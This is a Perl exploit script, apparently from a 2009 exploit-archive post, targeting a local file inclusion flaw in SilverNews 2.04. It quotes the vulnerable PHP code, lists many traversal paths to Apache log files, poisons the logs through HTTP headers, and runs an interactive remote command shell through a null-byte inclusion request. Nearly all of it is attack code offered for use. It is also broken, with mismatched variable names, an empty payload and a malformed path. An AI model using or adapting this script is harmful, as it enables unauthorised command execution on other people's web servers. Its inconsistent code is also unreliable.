silvernews-lfi.txt
Posted on 19 March 2009
#!/usr/bin/perl -w # SilverNews 2.04 Local File Inclusion Exploit # Script: http://www.silver-scripts.de # Vuln C0de: # require "admin/header.php"; # if (file_exists('admin/'.$_GET['section'].".php")) # require 'admin/'.$_GET['section'].'.php'; --->LFI # by d3b4g (Follow me on twitter.www.twitter.com/schaba) # From Tiny Little island of Maldivies # Home page:Redhatlive.com/blog use IO::Socket::INET; use LWP::Simple; my @apache_logs= qw( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # SilverNews 2.04 Local File Inclusion Exploit # # SilverNews.pl [Victim] / (apachepath) # # Ex: SilverNews.pl [Victim] / ../logs/error.log # --by d3b4g--- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfile... "; $C0DE=""; $sock = IO::Socket::INET->new( PeerAddr => $h0st, PeerPort => 80, Proto => "tcp" ) || die "Can't connect to $host:80! "; print $socket "GET ".$path.$CODE." HTTP/1.1 "; print $socket "user-Agent: ".$CODE." "; print $socket "Host: ".$host." "; print $socket "Connection: close "; close($socket); print "Write END to exit! "; print "If not working try another apache path "; print "[shell] ";$cmd = <STDIN> ; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die " Command are not executed. [-] Something wrong. Exploit Failed. "; print $socket "GET ".$path."index.php?op=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1 "; print $socket "Host: ".$host." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($pwn = <$socket>) { print $pwn; } print "[shell] "; $cmd = <STDIN> ; }
